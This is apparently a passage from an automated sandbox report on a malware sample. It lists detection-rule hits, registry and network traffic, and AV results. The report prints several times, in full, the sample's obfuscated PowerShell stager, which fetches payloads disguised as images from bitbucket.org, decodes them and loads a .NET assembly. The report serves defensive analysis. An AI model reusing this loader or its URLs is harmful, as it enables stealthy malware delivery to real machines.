#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#B
u#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Source: Process startedAuthor: frack113: Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J
#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nTHivMbGpg.exe, ProcessId: 1664, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in 
$shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random 
-InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", CommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", ProcessId: 7244, ProcessName: rundll32.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell "$codigo = '

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { 
return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-02T19:02:44.809157+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 185.166.143.50 | 443 | TCP


        AV Detection

        Source: nTHivMbGpg.exe | Avira: detected
        Source: nTHivMbGpg.exe | ReversingLabs: Detection: 39%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.8% probability
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD213214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF6FD213214
        Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49699 version: TLS 1.2
        Source: nTHivMbGpg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: s\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498B2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: nTHivMbGpg.exe
        Source: Binary string: wextract.pdbGCTL source: nTHivMbGpg.exe
        Source: Binary string: dows\System.Core.pdbL source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD212034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6FD212034
        Source: global traffic | HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1 Host: bitbucket.org
        Source: Joe Sandbox View | IP Address: 185.166.143.50
        Source: Joe Sandbox View | ASN Name: AMAZON-02US
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 185.166.143.50:443
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image.jpg?14441723 HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /hgdfhdfgd/test/downloads/new_image2.jpg?14461721 HTTP/1.1 Host: bitbucket.org
        Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 17:02:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 15020Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "b693a90a4b9b7ba5606827020189b49f"X-Dc-Location: Micros-3X-Served-By: 3c4d22791762X-Version: 3ff600212c86X-Static-Version: 3ff600212c86X-Request-Count: 394X-Render-Time: 0.08880853652954102X-B3-Traceid: 7002740a6d0144de9b07c02da296923cX-B3-Spanid: ab147ab00f9b85bbX-Frame-Options: SAMEORIGINContent-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com 
micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 17:02:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 15023Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "dcf3f17fb20258bb578342014cdbd4f0"X-Dc-Location: Micros-3X-Served-By: b49e06def07eX-Version: 3ff600212c86X-Static-Version: 3ff600212c86X-Request-Count: 154X-Render-Time: 0.08371186256408691X-B3-Traceid: 6e135e3382124723921a6252805b581aX-B3-Spanid: b2a3d0ff1cd02587X-Frame-Options: SAMEORIGINContent-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com 
